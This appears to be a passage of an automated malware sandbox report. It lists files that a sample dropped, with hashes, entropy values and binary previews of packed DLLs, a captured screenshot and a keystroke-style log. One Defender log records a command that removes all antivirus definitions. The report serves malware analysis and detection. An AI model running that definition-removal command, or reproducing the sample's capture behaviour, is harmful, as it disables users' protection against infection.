                                                                                                                                                                                                                              SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                                                                                                                                              SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                              Entropy (8bit):1.3107478092907292
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrQ:KooCEYhgYEL0In
                                                                                                                                                                                                                              MD5:C849D8846F5316DB6B3E90C1908D8E86
                                                                                                                                                                                                                              SHA1:B23B96BF33E124180492BF908144461DFD56FF58
                                                                                                                                                                                                                              SHA-256:E15DCD4770F6A9581F7050E7FA856FE782DD67C652CF8C9D776BF7AC265EEC37
                                                                                                                                                                                                                              SHA-512:71F69C5DB2FBC141FDACD24C881EA90992E2F028B20A2037182AD3AC27ACEB2313977DEF31CB136FA043C8F0833C24A82FF40322C5290BD49CCCE9ACF025D61B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x86cff748, page size 16384, Windows version 10.0
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                              Entropy (8bit):0.4221113835612634
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:/SB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:/azag03A2UrzJDO
                                                                                                                                                                                                                              MD5:13F44D5FCA035C9F7D003951B9B40C47
                                                                                                                                                                                                                              SHA1:C5F709360FAA337735BCB01F3F662BD5FB491D5D
                                                                                                                                                                                                                              SHA-256:63395BF7E22B102E8F66872F0BC6123AABC890F82F2E640BF2FD3C15262E3B67
                                                                                                                                                                                                                              SHA-512:DA7F7A645E4331B6BA1D70372EFECBFFD7E02C64030207D1289306400C59BFBC8BEAA20E2CDB4A7A3EA7FB117119F5898786E948EE5448F4126DCA193224965A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:...H... .......Y.......X\...;...{......................n.%..... ....|.......|..h.#..... ....|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................j.n ....|...................]u2 ....|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                              Entropy (8bit):0.07496313242742787
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:i/OetYeA9yZu+ySv1NZkBllOE/tlnl+/rTc:i/rzCKu+ySv1LkTpMP
                                                                                                                                                                                                                              MD5:6EEC32E61219C251020085A3F7E3F4BD
                                                                                                                                                                                                                              SHA1:02FC37108EB58BDBB88404A091A4CB8E8CA5B16D
                                                                                                                                                                                                                              SHA-256:0D27A0769B13D4D427449D921F12EA2AB014377901D7769B6F1A1C1F755D9AF6
                                                                                                                                                                                                                              SHA-512:DF1D8C06E41D5142710A6AD353C04E162B417FF1736E3E3780DB4253CA8FEF08684741D3108AB1056E8A668A132C1A571BC6522FD9B04A56A0328AA4A1DD5B48
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:........................................;...{.......|.. ....|.......... ....|.. ....|...`.. ....|...................]u2 ....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):654
                                                                                                                                                                                                                              Entropy (8bit):5.380476433908377
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):680924
                                                                                                                                                                                                                              Entropy (8bit):7.925479637764179
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:tQqK4s5SF/1cJ8n0Ac5jp4SypxFb6V7jfWrOzx1KsnWkqO2yusLGdf:+9C/a6cZp4hwz6YFKyusu
                                                                                                                                                                                                                              MD5:5C131EF780F05DED43C14E6F04BECF7D
                                                                                                                                                                                                                              SHA1:D5470AF7673CA297A06C99EBE6592C6A98C3EF81
                                                                                                                                                                                                                              SHA-256:820B3C32887980546CD22D374DA0DEBCC9262D9D9E621FD2BE2AB443E3D2CC36
                                                                                                                                                                                                                              SHA-512:1C2B859EEEE755C397D1DC51BE423543E02E6C3D76F3D9BFDB648400C8C3C774B872853D7CA459BDB31A5A72975AEDC1882AED64CA7FC2E31BC9CF8E88074869
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^......u...}.Q%....;......o.k.9..o..ql.%.. D32.^1.`.7..aL....6.8q.`:.$.Do..".....N.......g.u.ng.#.8...s.....z.\.[...r./k....1.0....g-\...cC...;.3j......;..R#.oB.2..{...8.2p.0..^..S_H0W....n......>...'......g7*...t.....O..`...S..3m.8..~..jnc..v...8z....b.G..|.'.....r.}...'.b ....=S....._^...||..#.k...D..../.3G...V...H.|..QQ?ty..1...Q...-..........#.....u=P......l.......'.k...}.>vob.......bC../..h.X...!wWs..].....k...Y1x.]#.yK}...v.0..w...w.`..;...Z.Fbv......eL.u.5g...=.>.9.0..........`...L.P<....P.......V.&...0q.x.~...}oN0...w.....b...5L.7....[1/~.....7..^KCm.%iN|....z.....&.Iq.@,.1N...k..r...9.=.......1....=...{.sKX...s./N.w...M.w[..w<7.m-..=..=...............n.B}..*X...g.....n...C{......O.?....O...4j........`....%.w.....s.K..t}\S..l..N..y...9.....g]..f^...w..7B.>..*os.a.x....b/.9q.....Q..n.k.....qNLu.8y 7y..;.1[.....>..TW.vu..V..g.....q-&
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                              Entropy (8bit):3.7195394315431693
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                                                                                                                                                              MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                                                                                                                                                              SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                                                                                                                                                                              SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                                                                                                                                                              SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):894
                                                                                                                                                                                                                              Entropy (8bit):3.110298466615917
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:Q58KRBubdpkoPAGdjrZNIocCk9+MlWlLehW51IC4NIocP:QOaqdmOFdjrztcV+kWResLILtcP
                                                                                                                                                                                                                              MD5:30BD7B912EBF1F5D5C54A7B8ECEFC1E9
                                                                                                                                                                                                                              SHA1:1E22D9DCEBD5A43C079F66A7AE6E8A045CAE664C
                                                                                                                                                                                                                              SHA-256:012AEC72B6929A53547C33243631C2AC3D0922800064EBDC8A2DFC9B2FD52C55
                                                                                                                                                                                                                              SHA-512:062351EB7FCE291FA0206A5517B7EA95917E672CB3D0E5CCB49DB291D97B867410B5055D87F4612CB7A0F1BA305E05DFB414A99D8EDF0D5B889E26962C75E36F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 1.3. .. 2.0.2.4. .1.3.:.0.1.:.4.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. O.c.t. .. 1.3. .. 2.0.2.4. .1.3.:.0.1.:.4.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Oct 13 18:30:42 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1372
                                                                                                                                                                                                                              Entropy (8bit):4.1098000463456925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:HSFq9s+fjnUDfHVwKefxFdYNII+ycuZhNsBakSPmPNnqS+d:ygjnSWKCzmu1ulWa3CqSe
                                                                                                                                                                                                                              MD5:F299C6CF45F22A3A27497E678EB3AF97
                                                                                                                                                                                                                              SHA1:45043954B891F1D97DA7B8F6763FC9833659043F
                                                                                                                                                                                                                              SHA-256:EBF9EDD8C60D6694AA63F0A00BFFA34A5562EC649C9A2A88BD9DE4B4841784C4
                                                                                                                                                                                                                              SHA-512:8BF52ED70BA677106D5977D195BD6614BCEE4073EA3DC2B2B01EC11A299C12D2856AE4502C8BF436983F27DF9022CD963F6A5677E0263B482200CBDE2D5677FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:L......g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP...............C.UL......u..Z.Z..........4.......C:\Users\user\AppData\Local\Temp\RESADCB.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.u.y.1.n.s.p.n...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):119192
                                                                                                                                                                                                                              Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                              MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                              SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                              SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                              SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49944
                                                                                                                                                                                                                              Entropy (8bit):7.795799692232421
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:8A0qhtL6ugh0BoGmZ0zlTUjZomYtgHQmchmzmrCWJ7+pj0I1CV50e5YiSyvaPAM+:8AX76ZKBT+jjvQ+a7i0I1CV597Sy4x+R
                                                                                                                                                                                                                              MD5:82E4F19C1E53EE3E46913D4DF0550AF7
                                                                                                                                                                                                                              SHA1:283741406ECF64AB64DF1D6D46558EDD1ABE2B03
                                                                                                                                                                                                                              SHA-256:78208DA0890AAFC68999C94AC52F1D5383EA75364EAF1A006D8B623ABE0A6BF0
                                                                                                                                                                                                                              SHA-512:3FD8377D5F365499944A336819684E858534C8A23B8B24882F441318EC305E444E09125A0C0AEDC10E31DBF94DB60B8E796B03B9E36ADBAD37AB19C7724F36EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d......f.........." ...(............Pu....................................................`.............................................H....................0..D..................................................P...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60696
                                                                                                                                                                                                                              Entropy (8bit):7.8378376093918645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:OGd2xRPNLaGFQFjd9MuC8Hj0Lm3Uqy7OI1LPZV7SyVx1w5:FMxVhFyjd9MSmCxyKI1LPZV85
                                                                                                                                                                                                                              MD5:FA360B7044312E7404704E1A485876D2
                                                                                                                                                                                                                              SHA1:6EA4AAD0692C016C6B2284DB77D54D6D1FC63490
                                                                                                                                                                                                                              SHA-256:F06C3491438F6685938789C319731DDF64BA1DA02CD71F43AB8829AF0E3F4E2F
                                                                                                                                                                                                                              SHA-512:DB853C338625F3E04B01B049B0CB22BDAED4E785EB43696AEDA71B558F0F58113446A96A3E5356607335435EE8C78069CE8C1BCDB580D00FD4BAACBEC97A4B6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d....f.........." ...(.....................................................P............`.........................................HL.......I.......@.......................L.......................................:..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):109848
                                                                                                                                                                                                                              Entropy (8bit):7.940561307180843
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:6cS+IIb1vd3BENABrkfqWTpjXTZtMI1Oq37jY:6cLIIBvdRFmvFVtF7k
                                                                                                                                                                                                                              MD5:B7012443C9C31FFD3AED70FE89AA82A0
                                                                                                                                                                                                                              SHA1:420511F6515139DA1610DE088EAAAF39B8AAD987
                                                                                                                                                                                                                              SHA-256:3B92D5CA6268A5AD0E92E5E403C621C56B17933DEF9D8C31E69AB520C30930D9
                                                                                                                                                                                                                              SHA-512:EC422B0BEE30FD0675D38888F056C50CA6955788D89C2A6448DDC30539656995627CF548E1B3AA2C4A77F2349B297C466AF8942F8133EF4E2DFB706C8C1785E9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d.....f.........." ...(.p...................................................@............`..........................................<..P....9.......0...........&...........=.......................................*..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc........0.......p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36632
                                                                                                                                                                                                                              Entropy (8bit):7.676180750303356
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:qUJAxZoP6y3dGOWm6UZBtVupFD/I1OIcK5YiSyvLGAMxkEu:/mjOWHKBteD/I1OIcI7SyT0xq
                                                                                                                                                                                                                              MD5:3A4A3A99A4A4ADAF60B9FAAF6A3EDBDA
                                                                                                                                                                                                                              SHA1:A55EA560ACCD3B11700E2E2600DC1C6E08341E2F
                                                                                                                                                                                                                              SHA-256:26EED7AAC1C142A83A236C5B35523A0922F14D643F6025DC3886398126DAE492
                                                                                                                                                                                                                              SHA-512:CB7D298E5E55D2BF999160891D6239AFDC15ADA83CD90A54FDA6060C91A4E402909A4623DCAA9A87990F2AF84D6EB8A51E919C45060C5E90511CD4AADB1CDB36
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N@.. ... ... ...... ..k!... ..k#... ..k$... ..k%... ..l!... ...!... ..h!... ...!.Y. ..l-... ..l ... ..l.... ..l"... .Rich.. .........................PE..d......f.........." ...(.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):88344
                                                                                                                                                                                                                              Entropy (8bit):7.925560123137083
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:PRMIb+tRn8VHPoUBL9ZEL7qzf7+pW4AHjI1xhTkLtQtI1Z1i17SyQxw:+WgRsHPoUVwqzf7+mHjWxNsII1Z1i1b
                                                                                                                                                                                                                              MD5:BAD668BBF4F0D15429F66865AF4C117B
                                                                                                                                                                                                                              SHA1:2A85C44D2E6AA09CE6C11F2D548B068C20B7B7F8
                                                                                                                                                                                                                              SHA-256:45B1FCDF4F3F97F9881AAA98B00046C4045B897F4095462C0BC4631DBADAC486
                                                                                                                                                                                                                              SHA-512:798470B87F5A91B9345092593FC40C08AB36F1684EEE77654D4058B37B62B40EC0DEB4AC36D9BE3BB7F69ADFDF207BF150820CDBC27F98B0FA718EC394DA7C51
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d......f.........." ...(. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26904
                                                                                                                                                                                                                              Entropy (8bit):7.471995988275221
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:uX+wITsyt4xW6QSp5vI1QUcp5YiSyv8+WAMxkEW7:1j4hpvI1QUc37SyIxC7
                                                                                                                                                                                                                              MD5:326E66D3CF98D0FA1DB2E4C9F1D73E31
                                                                                                                                                                                                                              SHA1:6ACE1304D4CB62D107333C3274E6246136AB2305
                                                                                                                                                                                                                              SHA-256:BF6A8C5872D995EDAB5918491FA8721E7D1B730F66C8404EE760C1E30CB1F40E
                                                                                                                                                                                                                              SHA-512:D7740693182040D469E93962792B3E706730C2F529AB39F7D9D7ADAB2E3805BB35D65DC8BB2BD264DA9D946F08D9C8A563342D5CB5774D73709AE4C8A3DE621C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d.....f.........." ...(.0.......... .....................................................`.............................................L.......P............`..............<....................................... ...@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):45336
                                                                                                                                                                                                                              Entropy (8bit):7.731477219829725
